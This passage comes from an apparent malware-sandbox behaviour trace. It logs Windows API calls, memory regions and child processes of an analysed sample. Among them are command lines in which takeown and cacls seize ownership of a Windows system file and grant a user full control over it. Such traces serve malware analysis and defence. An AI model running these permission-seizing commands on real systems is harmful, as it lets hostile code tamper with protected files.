0x1 [0269.824] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.824] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0269.824] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.824] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0269.824] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f0ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x24f0ac*=0x0, lpOverlapped=0x0) returned 1 [0269.824] GetLastError () returned 0x0 [0269.824] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.824] GetFileType (hFile=0xb8) returned 0x1 [0269.824] _get_osfhandle (_FileHandle=3) returned 0xb8 [0269.824] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0269.824] longjmp () [0269.824] _tell (_FileHandle=3) returned 226 [0269.824] _close (_FileHandle=3) returned 0 [0269.824] CmdBatNotificationStub () returned 0x1 [0269.824] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.824] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0269.826] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.826] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0269.827] _get_osfhandle (_FileHandle=0) returned 0x38 [0269.827] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0269.827] SetConsoleInputExeNameW () returned 0x1 [0269.827] GetConsoleOutputCP () returned 0x1b5 [0270.155] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0270.155] SetThreadUILanguage (LangId=0x0) returned 0x409 [0271.882] exit (_Code=1) Thread: id = 148 os_tid = 0x94c Process: id = "22" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x22845000" os_pid = "0xb24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x578" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1634 start_va = 0x7fbf1000 end_va = 0x7fbf1fff entry_point = 0x0 region_type = private name = "private_0x000000007fbf1000" filename = "" Region: id = 1635 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1636 start_va = 0x796a730000 end_va = 0x796a74ffff entry_point = 0x0 region_type = private name = "private_0x000000796a730000" filename = "" Region: id = 1637 start_va = 0x796a750000 end_va = 0x796a763fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796a750000" filename = "" Region: id = 1638 start_va = 0x796a770000 end_va = 0x796a7affff entry_point = 0x0 region_type = private name = "private_0x000000796a770000" filename = "" Region: id = 1639 start_va = 0x7df5ff5e0000 end_va = 0x7ff5ff5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5e0000" filename = "" Region: id = 1640 start_va = 0x7ff7fc9f0000 end_va = 0x7ff7fca12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc9f0000" filename = "" Region: id = 1641 start_va = 0x7ff7fca1d000 end_va = 0x7ff7fca1efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fca1d000" filename = "" Region: id = 1642 start_va = 0x7ff7fca1f000 end_va = 0x7ff7fca1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fca1f000" filename = "" Region: id = 1643 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1644 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1645 start_va = 0x796a730000 end_va = 0x796a73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796a730000" filename = "" Region: id = 1646 start_va = 0x796a740000 end_va = 0x796a746fff entry_point = 0x0 region_type = private name = "private_0x000000796a740000" filename = "" Region: id = 1647 start_va = 0x796a7b0000 end_va = 0x796a86dfff entry_point = 0x796a7b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1648 start_va = 0x796a870000 end_va = 0x796a8affff entry_point = 0x0 region_type = private name = "private_0x000000796a870000" filename = "" Region: id = 1649 start_va = 0x796a8b0000 end_va = 0x796a8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796a8b0000" filename = "" Region: id = 1650 start_va = 0x796a8c0000 end_va = 0x796a9bffff entry_point = 0x0 region_type = private name = "private_0x000000796a8c0000" filename = "" Region: id = 1651 start_va = 0x796a9c0000 end_va = 0x796a9c6fff entry_point = 0x0 region_type = private name = "private_0x000000796a9c0000" filename = "" Region: id = 1652 start_va = 0x796a9d0000 end_va = 0x796a9d0fff entry_point = 0x0 region_type = private name = "private_0x000000796a9d0000" filename = "" Region: id = 1653 start_va = 0x796a9e0000 end_va = 0x796a9e0fff entry_point = 0x0 region_type = private name = "private_0x000000796a9e0000" filename = "" Region: id = 1654 start_va = 0x796ab40000 end_va = 0x796ab4ffff entry_point = 0x0 region_type = private name = "private_0x000000796ab40000" filename = "" Region: id = 1655 start_va = 0x796ab50000 end_va = 0x796acd7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796ab50000" filename = "" Region: id = 1656 start_va = 0x796ace0000 end_va = 0x796ae60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796ace0000" filename = "" Region: id = 1657 start_va = 0x796ae70000 end_va = 0x796c26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796ae70000" filename = "" Region: id = 1658 start_va = 0x7ff7fc8f0000 end_va = 0x7ff7fc9effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc8f0000" filename = "" Region: id = 1659 start_va = 0x7ff7fca1b000 end_va = 0x7ff7fca1cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fca1b000" filename = "" Region: id = 1660 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1661 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1662 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1663 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1664 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1665 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1666 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1667 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1668 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1669 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1670 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1671 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1672 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1673 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6821 start_va = 0x796a9f0000 end_va = 0x796aa2ffff entry_point = 0x0 region_type = private name = "private_0x000000796a9f0000" filename = "" Region: id = 6822 start_va = 0x796aa30000 end_va = 0x796aa33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796aa30000" filename = "" Region: id = 6823 start_va = 0x796aa40000 end_va = 0x796aa46fff entry_point = 0x0 region_type = private name = "private_0x000000796aa40000" filename = "" Region: id = 6824 start_va = 0x796aa50000 end_va = 0x796aa54fff entry_point = 0x796aa50000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 6825 start_va = 0x796aa60000 end_va = 0x796aa60fff entry_point = 0x796aa60000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 6826 start_va = 0x796aa70000 end_va = 0x796aa71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796aa70000" filename = "" Region: id = 6827 start_va = 0x796aa80000 end_va = 0x796aa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796aa80000" filename = "" Region: id = 6828 start_va = 0x796aa90000 end_va = 0x796aa91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796aa90000" filename = "" Region: id = 6829 start_va = 0x796aac0000 end_va = 0x796aacffff entry_point = 0x0 region_type = private name = "private_0x000000796aac0000" filename = "" Region: id = 6830 start_va = 0x796c270000 end_va = 0x796c386fff entry_point = 0x0 region_type = private name = "private_0x000000796c270000" filename = "" Region: id = 6831 start_va = 0x796c400000 end_va = 0x796c40ffff entry_point = 0x0 region_type = private name = "private_0x000000796c400000" filename = "" Region: id = 6832 start_va = 0x796c410000 end_va = 0x796c746fff entry_point = 0x796c410000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6833 start_va = 0x796c750000 end_va = 0x796c96ffff entry_point = 0x0 region_type = private name = "private_0x000000796c750000" filename = "" Region: id = 6834 start_va = 0x796c970000 end_va = 0x796cb84fff entry_point = 0x0 region_type = private name = "private_0x000000796c970000" filename = "" Region: id = 6835 start_va = 0x796cb90000 end_va = 0x796cda9fff entry_point = 0x0 region_type = private name = "private_0x000000796cb90000" filename = "" Region: id = 6836 start_va = 0x796cdb0000 end_va = 0x796cec0fff entry_point = 0x0 region_type = private name = "private_0x000000796cdb0000" filename = "" Region: id = 6837 start_va = 0x796ced0000 end_va = 0x796cf87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000796ced0000" filename = "" Region: id = 6838 start_va = 0x7ff7fca19000 end_va = 0x7ff7fca1afff entry_point = 0x0 region_type = private name = "private_0x00007ff7fca19000" filename = "" Region: id = 6839 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6840 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6841 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6842 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6843 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6844 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6845 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6846 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6847 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6848 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6849 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6850 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6851 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 144 os_tid = 0x9f8 Thread: id = 145 os_tid = 0xb4c Thread: id = 146 os_tid = 0x9e8 Thread: id = 147 os_tid = 0x788 Process: id = "23" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x22233000" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x578" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1720 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1721 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1722 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1723 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1724 start_va = 0xa0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1725 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1726 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1727 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1728 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 1729 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 1730 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1731 start_va = 0x7ecb0000 end_va = 0x7ecd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecb0000" filename = "" Region: id = 1732 start_va = 0x7ecd5000 end_va = 0x7ecd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ecd5000" filename = "" Region: id = 1733 start_va = 0x7ecd6000 end_va = 0x7ecd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ecd6000" filename = "" Region: id = 1734 start_va = 0x7ecdd000 end_va = 0x7ecdffff entry_point = 0x0 region_type = private name = "private_0x000000007ecdd000" filename = "" Region: id = 1735 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1736 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1737 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1738 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1739 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1740 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1741 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1742 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1743 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1744 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 149 os_tid = 0x994 Thread: id = 150 os_tid = 0x978 Process: id = "24" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x21ac3000" os_pid = "0x96c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x578" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1756 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 1757 start_va = 0xb10000 end_va = 0x4b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 1758 start_va = 0x4b10000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 1759 start_va = 0x4b30000 end_va = 0x4b31fff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 1760 start_va = 0x4b40000 end_va = 0x4b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b40000" filename = "" Region: id = 1761 start_va = 0x4b60000 end_va = 0x4b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 1762 start_va = 0x4ba0000 end_va = 0x4bdffff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 1763 start_va = 0x4be0000 end_va = 0x4be3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004be0000" filename = "" Region: id = 1764 start_va = 0x4bf0000 end_va = 0x4bf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bf0000" filename = "" Region: id = 1765 start_va = 0x4c00000 end_va = 0x4c01fff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1766 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1767 start_va = 0x7eaa0000 end_va = 0x7eac2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eaa0000" filename = "" Region: id = 1768 start_va = 0x7eac9000 end_va = 0x7eac9fff entry_point = 0x0 region_type = private name = "private_0x000000007eac9000" filename = "" Region: id = 1769 start_va = 0x7eaca000 end_va = 0x7eaccfff entry_point = 0x0 region_type = private name = "private_0x000000007eaca000" filename = "" Region: id = 1770 start_va = 0x7eacd000 end_va = 0x7eacdfff entry_point = 0x0 region_type = private name = "private_0x000000007eacd000" filename = "" Region: id = 1771 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1772 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1773 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1774 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1775 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1776 start_va = 0x4c30000 end_va = 0x4c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 1777 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1778 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1779 start_va = 0x4d60000 end_va = 0x4e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d60000" filename = "" Region: id = 1780 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1789 start_va = 0x4b10000 end_va = 0x4b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 1790 start_va = 0x4b20000 end_va = 0x4b23fff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 1791 start_va = 0x4b30000 end_va = 0x4b34fff entry_point = 0x4b30000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 1792 start_va = 0x4c10000 end_va = 0x4c10fff entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 1793 start_va = 0x4c20000 end_va = 0x4c20fff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 1794 start_va = 0x4c40000 end_va = 0x4cfdfff entry_point = 0x4c40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1795 start_va = 0x4d00000 end_va = 0x4d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 1796 start_va = 0x4e60000 end_va = 0x4e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 1797 start_va = 0x4f60000 end_va = 0x4f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f60000" filename = "" Region: id = 1798 start_va = 